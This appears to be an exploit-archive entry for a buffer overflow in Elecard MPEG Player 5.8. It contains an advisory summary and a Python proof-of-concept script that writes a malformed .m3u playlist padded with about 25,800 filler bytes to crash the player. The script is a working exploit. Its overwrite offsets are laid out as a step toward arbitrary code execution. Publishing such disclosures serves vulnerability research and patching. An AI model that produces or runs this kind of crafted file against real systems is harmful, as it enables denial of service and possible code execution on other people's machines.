Elecard MPEG Player - '.m3u' File Buffer Overflow

Author: metacom
type: dos
platform: windows
port: 
date_added: 2013-04-27 
date_updated: 2015-10-20 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/59534/info

Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected.

#!/usr/bin/python
# Exploit Title:Elecard MPEG Player 5.8 Local PoC
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German

head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"

buffer= "\x41" * 783
buffer+="\x42" * 4
buffer+="\x43" * 4
buffer+="\x44" * 25000

textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()